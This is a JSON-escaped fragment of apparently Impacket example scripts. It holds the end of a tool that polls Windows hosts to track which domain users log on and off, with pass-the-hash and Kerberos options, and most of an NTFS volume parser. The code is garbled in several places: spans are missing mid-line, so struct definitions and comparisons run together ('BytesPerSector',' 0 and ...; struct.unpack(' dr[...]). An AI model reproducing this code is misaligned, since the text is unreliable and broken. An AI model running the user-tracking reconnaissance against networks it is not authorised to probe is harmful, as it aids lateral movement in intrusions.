self.__maxConnections += 1\n return\n elif str(e).upper().find('ACCESS_DENIED'):\n # We're not admin, bye\n dce.disconnect()\n self.__maxConnections += 1\n self.__targets[target]['Admin'] = False\n return\n else:\n raise\n\n if self.__maxConnections < 0:\n # Can't keep this connection open. Closing it\n dce.disconnect()\n self.__maxConnections = 0\n else:\n self.__targets[target]['WKST'] = dce\n\n # Let's see who looged in locally since last check\n tmpLoggedUsers = set()\n printCRLF = False\n for session in resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']:\n userName = session['wkui1_username'][:-1]\n logonDomain = session['wkui1_logon_domain'][:-1]\n key = '%s\\x01%s' % (userName, logonDomain)\n tmpLoggedUsers.add(key)\n if not(key in self.__targets[target]['LoggedIn']):\n self.__targets[target]['LoggedIn'].add(key)\n # Are we filtering users?\n if self.__filterUsers is not None:\n if userName in self.__filterUsers:\n logging.info(\"%s: user %s\\\\%s logged in LOCALLY\" % (target,logonDomain,userName))\n printCRLF=True\n else:\n logging.info(\"%s: user %s\\\\%s logged in LOCALLY\" % (target,logonDomain,userName))\n printCRLF=True\n\n # Let's see who logged out since last check\n for session in self.__targets[target]['LoggedIn'].copy():\n userName, logonDomain = session.split('\\x01')\n if session not in tmpLoggedUsers:\n self.__targets[target]['LoggedIn'].remove(session)\n # Are we filtering users?\n if self.__filterUsers is not None:\n if userName in self.__filterUsers:\n logging.info(\"%s: user %s\\\\%s logged off LOCALLY\" % (target,logonDomain,userName))\n printCRLF=True\n else:\n logging.info(\"%s: user %s\\\\%s logged off LOCALLY\" % (target,logonDomain,userName))\n printCRLF=True\n \n if printCRLF is True:\n print()\n\n def stop(self):\n if self.__targetsThreadEvent is not None:\n self.__targetsThreadEvent.set()\n \n\n# Process command-line arguments.\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('identity', action='store', help='[domain/]username[:password]')\n parser.add_argument('-user', action='store', help='Filter output by this user')\n parser.add_argument('-users', type=argparse.FileType('r'), help='input file with list of users to filter to output for')\n #parser.add_argument('-group', action='store', help='Filter output by members of this group')\n #parser.add_argument('-groups', type=argparse.FileType('r'), help='Filter output by members of the groups included in the input file')\n parser.add_argument('-target', action='store', help='target system to query info from. If not specified script will '\n 'run in domain mode.')\n parser.add_argument('-targets', type=argparse.FileType('r'), help='input file with targets system to query info '\n 'from (one per line). If not specified script will run in domain mode.')\n parser.add_argument('-noloop', action='store_true', default=False, help='Stop after the first probe')\n parser.add_argument('-delay', action='store', default = '10', help='seconds delay between starting each batch probe '\n '(default 10 seconds)')\n parser.add_argument('-max-connections', action='store', default='1000', help='Max amount of connections to keep '\n 'opened (default 1000)')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n group.add_argument('-dc-ip', action='store',metavar = \"ip address\", help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) specified in the target parameter')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, _, _, options.k = parse_identity(options.identity, options.hashes, options.no_pass, options.aesKey, options.k)\n\n try:\n executer = USERENUM(username, password, domain, options.hashes, options.aesKey, options.k, options)\n executer.run()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(e)\n executer.stop()\n except KeyboardInterrupt:\n logging.info('Quitting.. please wait') \n executer.stop()\n sys.exit(0)\n" }, { "path": "examples/ntfs-read.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Mini shell for browsing an NTFS volume\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# Reference for:\n# Structure. Quick and dirty implementation.. just for fun.. ;)\n#\n# NOTE: Lots of info (mainly the structs) taken from the NTFS-3G project..\n#\n# ToDo:\n# [] Support compressed, encrypted files\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport os\nimport sys\nimport logging\nimport struct\nimport argparse\nimport cmd\nimport ntpath\nfrom six import PY2, text_type\nfrom datetime import datetime\nfrom impacket.examples import logger\nfrom impacket import version\nfrom impacket.structure import Structure, hexdump\n\n\n# Reserved/fixed MFTs\nFIXED_MFTS = 16\n\n# Attribute types\nUNUSED = 0\nSTANDARD_INFORMATION = 0x10\nATTRIBUTE_LIST = 0x20\nFILE_NAME = 0x30\nOBJECT_ID = 0x40\nSECURITY_DESCRIPTOR = 0x50\nVOLUME_NAME = 0x60\nVOLUME_INFORMATION = 0x70\nDATA = 0x80\nINDEX_ROOT = 0x90\nINDEX_ALLOCATION = 0xa0\nBITMAP = 0xb0\nREPARSE_POINT = 0xc0\nEA_INFORMATION = 0xd0\nEA = 0xe0\nPROPERTY_SET = 0xf0\nLOGGED_UTILITY_STREAM = 0x100\nFIRST_USER_DEFINED_ATTRIBUTE = 0x1000\nEND = 0xffffffff\n\n# Attribute flags\nATTR_IS_COMPRESSED = 0x0001\nATTR_COMPRESSION_MASK = 0x00ff\nATTR_IS_ENCRYPTED = 0x4000\nATTR_IS_SPARSE = 0x8000\n\n# FileName type flags\nFILE_NAME_POSIX = 0x00\nFILE_NAME_WIN32 = 0x01\nFILE_NAME_DOS = 0x02\nFILE_NAME_WIN32_AND_DOS = 0x03\n\n# MFT Record flags\nMFT_RECORD_IN_USE = 0x0001\nMFT_RECORD_IS_DIRECTORY = 0x0002\nMFT_RECORD_IS_4 = 0x0004\nMFT_RECORD_IS_VIEW_INDEX = 0x0008\nMFT_REC_SPACE_FILLER = 0xfffff\n\n# File Attribute Flags\nFILE_ATTR_READONLY = 0x0001\nFILE_ATTR_HIDDEN = 0x0002\nFILE_ATTR_SYSTEM = 0x0004\nFILE_ATTR_DIRECTORY = 0x0010\nFILE_ATTR_ARCHIVE = 0x0020\nFILE_ATTR_DEVICE = 0x0040\nFILE_ATTR_NORMAL = 0x0080\nFILE_ATTR_TEMPORARY = 0x0100\nFILE_ATTR_SPARSE_FILE = 0x0200\nFILE_ATTR_REPARSE_POINT = 0x0400\nFILE_ATTR_COMPRESSED = 0x0800\nFILE_ATTR_OFFLINE = 0x1000\nFILE_ATTR_NOT_CONTENT_INDEXED = 0x2000\nFILE_ATTR_ENCRYPTED = 0x4000\nFILE_ATTR_VALID_FLAGS = 0x7fb7\nFILE_ATTR_VALID_SET_FLAGS = 0x31a7\nFILE_ATTR_I30_INDEX_PRESENT = 0x10000000\nFILE_ATTR_VIEW_INDEX_PRESENT = 0x20000000\n\n# NTFS System files\nFILE_MFT = 0\nFILE_MFTMirr = 1\nFILE_LogFile = 2\nFILE_Volume = 3\nFILE_AttrDef = 4\nFILE_Root = 5\nFILE_Bitmap = 6\nFILE_Boot = 7\nFILE_BadClus = 8\nFILE_Secure = 9\nFILE_UpCase = 10\nFILE_Extend = 11\n\n# Index Header Flags\nSMALL_INDEX = 0\nLARGE_INDEX = 1\nLEAF_NODE = 0\nINDEX_NODE = 1\nNODE_MASK = 0\n\n# Index Entry Flags\nINDEX_ENTRY_NODE = 1\nINDEX_ENTRY_END = 2\nINDEX_ENTRY_SPACE_FILLER = 0xffff\n\n\nclass NTFS_BPB(Structure):\n structure = (\n ('BytesPerSector',' 0 and self.AttributeHeader['Type'] != END:\n self.AttributeName = data[self.AttributeHeader['NameOffset']:][:self.AttributeHeader['NameLength']*2].decode('utf-16le')\n\n def getFlags(self):\n return self.AttributeHeader['Flags']\n\n def getName(self):\n return self.AttributeName\n\n def isNonResident(self):\n return self.AttributeHeader['NonResident']\n\n def dump(self):\n return self.AttributeHeader.dump()\n\n def getTotalSize(self):\n return self.AttributeHeader['Length']\n\n def getType(self):\n return self.AttributeHeader['Type']\n\nclass AttributeResident(Attribute):\n def __init__(self, iNode, data):\n logging.debug(\"Inside AttributeResident: iNode: %s\" % iNode.INodeNumber)\n Attribute.__init__(self,iNode,data)\n self.ResidentHeader = NTFS_ATTRIBUTE_RECORD_RESIDENT(data[len(self.AttributeHeader):])\n self.AttrValue = data[self.ResidentHeader['ValueOffset']:][:self.ResidentHeader['ValueLen']]\n\n def dump(self):\n return self.ResidentHeader.dump()\n\n def getFlags(self):\n return self.ResidentHeader['Flags']\n\n def getValue(self):\n return self.AttrValue\n\n def read(self,offset,length):\n logging.debug(\"Inside Read: offset: %d, length: %d\" %(offset,length))\n return self.AttrValue[offset:][:length]\n\n def getDataSize(self):\n return len(self.AttrValue)\n\nclass AttributeNonResident(Attribute):\n def __init__(self, iNode, data):\n logging.debug(\"Inside AttributeNonResident: iNode: %s\" % iNode.INodeNumber)\n Attribute.__init__(self,iNode,data)\n self._raw_attr_data = data\n self.NonResidentHeader = NTFS_ATTRIBUTE_RECORD_NON_RESIDENT(data[len(self.AttributeHeader):])\n self.AttrValue = data[self.NonResidentHeader['DataRunsOffset']:][:self.NonResidentHeader['AllocatedSize']]\n self.DataRuns = []\n self.ClusterSize = 0\n # Effective sizes for OS-like reads; default to on-disk header values.\n self.data_size = self.NonResidentHeader['DataSize']\n self.initialized_size = self.NonResidentHeader['InitializedSize']\n self.parseDataRuns()\n\n def dump(self):\n return self.NonResidentHeader.dump()\n\n def getDataSize(self):\n return self.data_size\n\n def getValue(self):\n return None\n\n def parseDataRuns(self):\n \"\"\"Parse data run descriptors from the attribute value.\"\"\"\n data = self.AttrValue\n if data is None:\n return\n\n vcn = 0\n prevLcn = 0 # LCN is delta-encoded, track previous\n\n while data and data[0:1] != b'\\x00':\n if len(data) < 1:\n break\n\n header = data[0]\n data = data[1:]\n\n lengthBytes = header & 0x0F\n offsetBytes = header >> 4\n\n # Parse cluster count (length)\n if len(data) < lengthBytes:\n break\n clusterCount = struct.unpack(' dr['LastVCN']:\n continue\n # Stop if we've passed all relevant data runs\n if vcn < dr['StartVCN']:\n break\n\n # Calculate how many clusters to read from this data run\n clustersInRun = dr['LastVCN'] - vcn + 1\n clustersToRead = min(clustersLeft, clustersInRun)\n\n # For sparse runs, LCN is -1; readClusters handles this\n if dr['LCN'] == -1:\n lcn = -1\n else:\n lcn = dr['LCN'] + (vcn - dr['StartVCN'])\n\n tmpBuf = self.readClusters(clustersToRead, lcn)\n if tmpBuf is None:\n break\n buf += tmpBuf\n clustersLeft -= clustersToRead\n vcn += clustersToRead\n\n return buf\n\n def read(self, offset, length):\n \"\"\"Read bytes from non-resident attribute, respecting data_size and initialized_size.\"\"\"\n logging.debug(\"Inside Read: offset: %d, length: %d\" % (offset, length))\n\n # Clamp read to data_size (EOF)\n if offset >= self.data_size:\n return b''\n length = min(length, self.data_size - offset)\n\n self.ClusterSize = self.NTFSVolume.BPB['BytesPerSector'] * self.NTFSVolume.BPB['SectorsPerCluster']\n\n buf = b''\n curOffset = offset\n bytesLeft = length\n\n while bytesLeft > 0:\n vcn = curOffset // self.ClusterSize\n vcnOffset = curOffset % self.ClusterSize\n\n # Calculate clusters needed for remaining bytes\n bytesInFirstCluster = self.ClusterSize - vcnOffset\n if bytesLeft <= bytesInFirstCluster:\n clustersToRead = 1\n else:\n clustersToRead = 1 + ((bytesLeft - bytesInFirstCluster + self.ClusterSize - 1) // self.ClusterSize)\n\n clusterData = self.readVCN(vcn, clustersToRead)\n if not clusterData:\n break\n\n # Extract the portion we need\n chunk = clusterData[vcnOffset:vcnOffset + bytesLeft]\n buf += chunk\n curOffset += len(chunk)\n bytesLeft -= len(chunk)\n\n if len(chunk) == 0:\n break\n\n if not buf:\n return None\n\n # Zero-fill beyond InitializedSize (OS behavior for uninitialized data)\n if self.initialized_size < offset + len(buf):\n validBytes = max(0, self.initialized_size - offset)\n buf = buf[:validBytes] + (b'\\x00' * (len(buf) - validBytes))\n\n return buf\n\nclass NonResidentDataAttribute(AttributeNonResident):\n @classmethod\n def _shift_runs(cls, attr, start_vcn):\n if start_vcn <= 0:\n return\n for dr in attr.DataRuns:\n dr['StartVCN'] += start_vcn\n dr['LastVCN'] += start_vcn\n\n @classmethod\n def _base_sizes(cls, attr):\n return attr.NonResidentHeader['DataSize'], attr.NonResidentHeader['InitializedSize']\n\n @classmethod\n def _ensure_base(cls, collected, base_attr, base_data_size, base_initialized_size):\n if base_attr is not None:\n return base_attr, base_data_size, base_initialized_size\n _, base_attr = collected[0]\n base_data_size, base_initialized_size = cls._base_sizes(base_attr)\n return base_attr, base_data_size, base_initialized_size\n\n @classmethod\n def _collect_extents(cls, iNode, matches, attribute_name):\n \"\"\"Collect $DATA attributes from extent records, identifying the base extent.\"\"\"\n collected = []\n base_attr = None\n base_data_size = None\n base_initialized_size = None\n\n for entry in matches:\n extension_inode = iNode.NTFSVolume.getINode(entry.MftRecordNumber)\n attr = extension_inode.searchAttribute(DATA, attribute_name)\n if attr is None:\n continue\n collected.append((entry, attr))\n # Base extent has StartingVCN == 0 and contains authoritative sizes\n if entry.StartingVCN == 0:\n base_attr = attr\n if isinstance(attr, AttributeNonResident):\n base_data_size, base_initialized_size = cls._base_sizes(attr)\n\n return collected, base_attr, base_data_size, base_initialized_size\n\n def __init__(self, iNode, entries, attribute_name=None):\n \"\"\"\n Build a unified $DATA stream from multiple attribute list entries.\n\n Args:\n iNode: Owning inode for volume access\n entries: AttributeListEntry items for the target $DATA stream\n attribute_name: Stream name (None for default $DATA)\n \"\"\"\n matches = list(entries)\n if not matches:\n raise ValueError('No $DATA extents found')\n\n # Sort extents by StartingVCN to define logical order\n matches.sort(key=lambda e: e.StartingVCN)\n\n # Collect attributes and find base extent (StartingVCN == 0)\n collected, base_attr, base_data_size, base_initialized_size = self._collect_extents(\n iNode, matches, attribute_name,\n )\n\n if not collected:\n raise ValueError('No usable $DATA extents found')\n\n # Ensure we have valid base sizes\n base_attr, base_data_size, base_initialized_size = self._ensure_base(\n collected, base_attr, base_data_size, base_initialized_size,\n )\n\n # Initialize from base extent\n super(NonResidentDataAttribute, self).__init__(iNode, base_attr._raw_attr_data)\n\n if len(collected) == 1:\n # Single extent - apply VCN offset if needed\n entry, _ = collected[0]\n self._shift_runs(self, entry.StartingVCN)\n else:\n # Multi-extent - merge all runs with proper VCN offsets\n self._merge_extents_from_collected(collected, base_data_size, base_initialized_size)\n\n def _merge_extents_from_collected(self, collected, data_size, init_size):\n \"\"\"Merge data runs from multiple extents into unified stream.\"\"\"\n merged_runs = []\n for entry, attr in collected:\n if not isinstance(attr, AttributeNonResident):\n continue\n for dr in attr.DataRuns:\n new_dr = NTFS_DATA_RUN()\n new_dr['LCN'] = dr['LCN']\n new_dr['Clusters'] = dr['Clusters']\n # Apply VCN offset from attribute list entry\n new_dr['StartVCN'] = dr['StartVCN'] + entry.StartingVCN\n new_dr['LastVCN'] = dr['LastVCN'] + entry.StartingVCN\n merged_runs.append(new_dr)\n\n merged_runs.sort(key=lambda dr: dr['StartVCN'])\n self.DataRuns = merged_runs\n self.data_size = data_size\n self.initialized_size = init_size\n\n\nclass AttributeStandardInfo:\n def __init__(self, attribute):\n logging.debug(\"Inside AttributeStandardInfo\")\n self.Attribute = attribute\n self.StandardInfo = NTFS_STANDARD_INFORMATION(self.Attribute.AttrValue)\n\n def getFileAttributes(self):\n return self.StandardInfo['FileAttributes']\n\n def getFileTime(self):\n if self.StandardInfo['LastDataChangeTime'] > 0:\n return datetime.fromtimestamp(getUnixTime(self.StandardInfo['LastDataChangeTime']))\n else:\n return 0\n\n def dump(self):\n return self.StandardInfo.dump()\n\nclass AttributeFileName:\n def __init__(self, attribute):\n logging.debug(\"Inside AttributeFileName\")\n self.Attribute = attribute\n self.FileNameRecord = NTFS_FILE_NAME_ATTR(self.Attribute.AttrValue)\n\n def getFileNameType(self):\n return self.FileNameRecord['FileNameType']\n\n def getFileAttributes(self):\n return self.FileNameRecord['FileAttributes']\n\n def getFileName(self):\n return self.FileNameRecord['FileName'].decode('utf-16le')\n\n def getFileSize(self):\n return self.FileNameRecord['DataSize']\n\n def getFlags(self):\n return self.FileNameRecord['FileAttributes']\n\n def dump(self):\n return self.FileNameRecord.dump()\n\nclass AttributeIndexAllocation:\n def __init__(self, attribute):\n logging.debug(\"Inside AttributeIndexAllocation\")\n self.Attribute = attribute\n\n def dump(self):\n print(self.Attribute.dump())\n for i in self.Attribute.DataRuns:\n print(i.dump())\n\n def read(self, offset, length):\n return self.Attribute.read(offset, length)\n\n\nclass AttributeIndexRoot:\n def __init__(self, attribute):\n logging.debug(\"Inside AttributeIndexRoot\")\n self.Attribute = attribute\n self.IndexRootRecord = NTFS_INDEX_ROOT(attribute.AttrValue)\n self.IndexEntries = []\n self.parseIndexEntries()\n\n def parseIndexEntries(self):\n data = self.Attribute.AttrValue[len(self.IndexRootRecord):]\n while True:\n ie = IndexEntry(data)\n self.IndexEntries.append(ie)\n if ie.isLastNode():\n break\n data = data[ie.getSize():]\n\n def dump(self):\n self.IndexRootRecord.dump()\n for i in self.IndexEntries:\n i.dump()\n\n def getType(self):\n return self.IndexRootRecord['Type']\n\nclass IndexEntry:\n def __init__(self, entry):\n self.entry = NTFS_INDEX_ENTRY(entry)\n\n def isSubNode(self):\n return self.entry['EntryHeader']['Flags'] & INDEX_ENTRY_NODE\n\n def isLastNode(self):\n return self.entry['EntryHeader']['Flags'] & INDEX_ENTRY_END\n\n def getVCN(self):\n return struct.unpack('> 48) & 0xFFFF\n self.AttributeName = None\n name_len = self.EntryHeader['AttributeNameLength']\n if name_len > 0:\n name_offset = self.EntryHeader['AttributeNameOffset']\n name_bytes = entry_data[name_offset : name_offset + (name_len * 2)]\n self.AttributeName = name_bytes.decode('utf-16le')\n\nclass AttributeList:\n \"\"\"Parses ATTRIBUTE_LIST attribute (can be resident or non-resident).\"\"\"\n\n def __init__(self, attribute):\n self.attribute = attribute\n self.Entries = []\n self._parseEntries()\n\n def _parseEntries(self):\n \"\"\"Parse attribute list entries from raw data.\"\"\"\n # getValue() works for resident, read() for non-resident\n if hasattr(self.attribute, 'getValue') and self.attribute.getValue() is not None:\n data = self.attribute.getValue()\n else:\n data = self.attribute.read(0, self.attribute.getDataSize())\n\n if not data:\n return\n\n offset = 0\n while offset < len(data):\n entry_data = data[offset:]\n if len(entry_data) < 26: # Minimum entry size\n break\n list_entry = AttributeListEntry(entry_data)\n if list_entry.EntryLength == 0:\n break\n self.Entries.append(list_entry)\n offset += list_entry.EntryLength\n\n def getEntries(self):\n return self.Entries\n\nclass INODE:\n def __init__(self, NTFSVolume):\n self.NTFSVolume = NTFSVolume\n # This is the entire file record\n self.INodeNumber = None\n self.Attributes = {}\n self.AttributesRaw = None\n self.AttributesLastPos = None\n # Some interesting Attributes to parse\n self.FileAttributes = 0\n self.LastDataChangeTime = None\n self.FileName = None\n self.FileSize = 0\n # Debug counters for directory listings\n self._walk_root_count = 0\n self._walk_subnode_count = 0\n\n def isDirectory(self):\n return self.FileAttributes & FILE_ATTR_I30_INDEX_PRESENT\n\n def isCompressed(self):\n return self.FileAttributes & FILE_ATTR_COMPRESSED\n\n def isEncrypted(self):\n return self.FileAttributes & FILE_ATTR_ENCRYPTED\n\n def isSparse(self):\n return self.FileAttributes & FILE_ATTR_SPARSE_FILE\n\n def displayName(self):\n if self.LastDataChangeTime is not None and self.FileName is not None:\n try:\n# print \"%d - %s %s %s \" %( self.INodeNumber, self.getPrintableAttributes(), self.LastDataChangeTime.isoformat(' '), self.FileName)\n print(\"%s %s %15d %s \" %( self.getPrintableAttributes(), self.LastDataChangeTime.isoformat(' '), self.FileSize, self.FileName))\n except Exception as e:\n logging.error('Exception when trying to display inode %d: %s' % (self.INodeNumber,str(e)))\n\n def getPrintableAttributes(self):\n mask = ''\n if self.FileAttributes & FILE_ATTR_I30_INDEX_PRESENT:\n mask += 'd'\n else:\n mask += '-'\n if self.FileAttributes & FILE_ATTR_HIDDEN:\n mask += 'h'\n else:\n mask += '-'\n if self.FileAttributes & FILE_ATTR_SYSTEM:\n mask += 'S'\n else:\n mask += '-'\n if self.isCompressed():\n mask += 'C'\n else:\n mask += '-'\n if self.isEncrypted():\n mask += 'E'\n else:\n mask += '-'\n if self.isSparse():\n mask += 's'\n else:\n mask += '-'\n return mask\n\n def parseAttributes(self):\n # Parse Standard Info\n attr = self.searchAttribute(STANDARD_INFORMATION, None)\n if attr is not None:\n si = AttributeStandardInfo(attr)\n self.Attributes[STANDARD_INFORMATION] = si\n self.FileAttributes |= si.getFileAttributes()\n self.LastDataChangeTime = si.getFileTime()\n self.Attributes[STANDARD_INFORMATION] = si\n\n # Parse Filename\n attr = self.searchAttribute(FILE_NAME, None)\n while attr is not None:\n fn = AttributeFileName(attr)\n if fn.getFileNameType() != FILE_NAME_DOS:\n self.FileName = fn.getFileName()\n self.FileSize = fn.getFileSize()\n self.FileAttributes |= fn.getFileAttributes()\n self.Attributes[FILE_NAME] = fn\n break\n attr = self.searchAttribute(FILE_NAME, None, True)\n\n # Parse Attribute list before Index Allocation, because it might be there\n attr = self.searchAttribute(ATTRIBUTE_LIST, None)\n if attr is not None:\n al = AttributeList(attr)\n self.Attributes[ATTRIBUTE_LIST] = al\n\n # Parse Index Allocation\n attr = self.searchAttribute(INDEX_ALLOCATION, u'$I30')\n if attr is not None:\n ia = AttributeIndexAllocation(attr)\n self.Attributes[INDEX_ALLOCATION] = ia\n\n attr = self.searchAttribute(INDEX_ROOT, u'$I30')\n if attr is not None:\n ir = AttributeIndexRoot(attr)\n self.Attributes[INDEX_ROOT] = ir\n\n def searchAttribute(self, attributeType, attributeName, findNext = False):\n logging.debug(\"Inside searchAttribute: type: 0x%x, name: %s\" % (attributeType, attributeName))\n record = None\n\n if findNext is True:\n data = self.AttributesLastPos\n else:\n data = self.AttributesRaw\n\n while True:\n\n if len(data) <= 8:\n record = None\n break\n\n record = Attribute(self,data)\n\n if record.getType() == END:\n record = None\n break\n\n if record.getTotalSize() == 0:\n record = None\n break\n\n if record.getType() == attributeType and record.getName() == attributeName:\n if record.isNonResident() == 1:\n record = AttributeNonResident(self, data)\n else:\n record = AttributeResident(self, data)\n\n self.AttributesLastPos = data[record.getTotalSize():]\n\n break\n\n data = data[record.getTotalSize():]\n\n # Look for attribute on Attribute List\n if record is None and ATTRIBUTE_LIST in self.Attributes:\n attr_list = self.Attributes[ATTRIBUTE_LIST]\n\n if attributeType == DATA:\n entries = [\n entry for entry in attr_list.getEntries()\n if entry.AttributeType == DATA and entry.AttributeName == attributeName\n ]\n try:\n return NonResidentDataAttribute(self, entries, attributeName)\n except ValueError:\n return None\n\n for entry in attr_list.getEntries():\n if entry.AttributeType == attributeType and entry.AttributeName == attributeName:\n extension_inode = self.NTFSVolume.getINode(entry.MftRecordNumber)\n return extension_inode.searchAttribute(attributeType, attributeName)\n\n return record\n\n def PerformFixUp(self, record, buf, numSectors):\n # It fixes the sequence WORDS on every sector of a cluster\n # FixUps are used by:\n # FILE Records in the $MFT\n # INDX Records in directories and other indexes\n # RCRD Records in the $LogFile\n # RSTR Records in the $LogFile\n\n logging.debug(\"Inside PerformFixUp...\" )\n magicNum = struct.unpack(' 0 and entry.getINodeNumber() > 16:\n fn = NTFS_FILE_NAME_ATTR(entry.getKey())\n if fn['FileNameType'] != FILE_NAME_DOS:\n #inode = INODE(self.NTFSVolume)\n #inode.FileAttributes = fn['FileAttributes']\n #inode.FileSize = fn['DataSize']\n #inode.LastDataChangeTime = datetime.fromtimestamp(getUnixTime(fn['LastDataChangeTime']))\n #inode.INodeNumber = entry.getINodeNumber()\n #inode.FileName = fn['FileName'].decode('utf-16le')\n #inode.displayName()\n files.append(fn)\n# if inode.FileAttributes & FILE_ATTR_I30_INDEX_PRESENT and entry.getINodeNumber() > 16:\n# inode2 = self.NTFSVolume.getINode(entry.getINodeNumber())\n# inode2.walk()\n return files\n\n def walk(self):\n logging.debug(\"Inside Walk... \")\n files = []\n self._walk_root_count = 0\n self._walk_subnode_count = 0\n if INDEX_ROOT in self.Attributes:\n ir = self.Attributes[INDEX_ROOT]\n\n if ir.getType() & FILE_NAME:\n for ie in ir.IndexEntries:\n if ie.isSubNode():\n logging.debug(\"walk: INDEX_ROOT entry points to subnode VCN %d\", ie.getVCN())\n sub_files = self.walkSubNodes(ie.getVCN())\n self._walk_subnode_count += len(sub_files)\n files += sub_files\n else:\n if len(ie.getKey()) > 0 and ie.getINodeNumber() > 16:\n fn = NTFS_FILE_NAME_ATTR(ie.getKey())\n if fn['FileNameType'] != FILE_NAME_DOS:\n logging.debug(\"walk: INDEX_ROOT inline entry %s\", fn['FileName'].decode('utf-16le'))\n self._walk_root_count += 1\n files.append(fn)\n return files\n else:\n return None\n\n def findFirstSubNode(self, vcn, toSearch):\n def getFileName(entry):\n if len(entry.getKey()) > 0 and entry.getINodeNumber() > 16:\n fn = NTFS_FILE_NAME_ATTR(entry.getKey())\n if fn['FileNameType'] != FILE_NAME_DOS:\n return fn['FileName'].decode('utf-16le').upper()\n return None\n\n entries = self.parseIndexBlocks(vcn)\n for ie in entries:\n name = getFileName(ie)\n if name is not None:\n if name == toSearch:\n # Found!\n return ie\n if toSearch < name:\n if ie.isSubNode():\n res = self.findFirstSubNode(ie.getVCN(), toSearch)\n if res is not None:\n return res\n else:\n # Bye bye.. not found\n return None\n else:\n if ie.isSubNode():\n res = self.findFirstSubNode(ie.getVCN(), toSearch)\n if res is not None:\n return res\n\n\n def findFirst(self, fileName):\n # Searches for a file and returns an Index Entry. None if not found\n\n def getFileName(entry):\n if len(entry.getKey()) > 0 and entry.getINodeNumber() > 16:\n fn = NTFS_FILE_NAME_ATTR(entry.getKey())\n if fn['FileNameType'] != FILE_NAME_DOS:\n return fn['FileName'].decode('utf-16le').upper()\n return None\n\n toSearch = text_type(fileName.upper())\n\n if INDEX_ROOT in self.Attributes:\n ir = self.Attributes[INDEX_ROOT]\n if ir.getType() & FILE_NAME or 1==1:\n for ie in ir.IndexEntries:\n name = getFileName(ie)\n if name is not None:\n if name == toSearch:\n # Found!\n return ie\n if toSearch < name:\n if ie.isSubNode():\n res = self.findFirstSubNode(ie.getVCN(), toSearch)\n if res is not None:\n return res\n else:\n # Bye bye.. not found\n return None\n else:\n if ie.isSubNode():\n res = self.findFirstSubNode(ie.getVCN(), toSearch)\n if res is not None:\n return res\n\n def getStream(self, name):\n return self.searchAttribute( DATA, name, findNext = False)\n\n\nclass NTFS:\n def __init__(self, volumeName):\n self.__volumeName = volumeName\n self.__bootSector = None\n self.__MFTStart = None\n self.volumeFD = None\n self.BPB = None\n self.ExtendedBPB = None\n self.RecordSize = None\n self.IndexBlockSize = None\n self.SectorSize = None\n self.MFTINode = None\n self.mountVolume()\n\n def mountVolume(self):\n logging.debug(\"Mounting volume...\")\n self.volumeFD = open(self.__volumeName,\"rb\")\n self.readBootSector()\n self.MFTINode = self.getINode(FILE_MFT)\n # Check whether MFT is fragmented\n attr = self.MFTINode.searchAttribute(DATA, None)\n if attr is None:\n # It's not\n del self.MFTINode\n self.MFTINode = None\n\n def readBootSector(self):\n logging.debug(\"Reading Boot Sector for %s\" % self.__volumeName)\n\n self.volumeFD.seek(0,0)\n data = self.volumeFD.read(512)\n while len(data) < 512:\n data += self.volumeFD.read(512)\n\n self.__bootSector = NTFS_BOOT_SECTOR(data)\n self.BPB = NTFS_BPB(self.__bootSector['BPB'])\n self.ExtendedBPB = NTFS_EXTENDED_BPB(self.__bootSector['ExtendedBPB'])\n self.SectorSize = self.BPB['BytesPerSector']\n self.__MFTStart = self.BPB['BytesPerSector'] * self.BPB['SectorsPerCluster'] * self.ExtendedBPB['MFTClusterNumber']\n if self.ExtendedBPB['ClusterPerFileRecord'] > 0:\n self.RecordSize = self.BPB['BytesPerSector'] * self.BPB['SectorsPerCluster'] * self.ExtendedBPB['ClusterPerFileRecord']\n else:\n self.RecordSize = 1 << (-self.ExtendedBPB['ClusterPerFileRecord'])\n if self.ExtendedBPB['ClusterPerIndexBuffer'] > 0:\n self.IndexBlockSize = self.BPB['BytesPerSector'] * self.BPB['SectorsPerCluster'] * self.ExtendedBPB['ClusterPerIndexBuffer']\n else:\n self.IndexBlockSize = 1 << (-self.ExtendedBPB['ClusterPerIndexBuffer'])\n\n logging.debug(\"MFT should start at position %d\" % self.__MFTStart)\n\n def getINode(self, iNodeNum):\n logging.debug(\"Trying to fetch inode %d\" % iNodeNum)\n\n newINode = INODE(self)\n recordLen = self.RecordSize\n\n # Read MFT record from disk or through fragmented $MFT\n if self.MFTINode and iNodeNum > FIXED_MFTS:\n # Fragmented $MFT - read through MFT's $DATA attribute\n attr = self.MFTINode.searchAttribute(DATA, None)\n if attr is None:\n logging.error(\"Cannot find MFT $DATA attribute for inode %d\" % iNodeNum)\n return newINode\n record = attr.read(iNodeNum * self.RecordSize, self.RecordSize)\n else:\n diskPosition = self.__MFTStart + iNodeNum * self.RecordSize\n self.volumeFD.seek(diskPosition, 0)\n record = self.volumeFD.read(recordLen)\n while len(record) < recordLen:\n record += self.volumeFD.read(recordLen - len(record))\n\n if not record or len(record) < recordLen:\n logging.error(\"Failed to read MFT record for inode %d\" % iNodeNum)\n return newINode\n\n 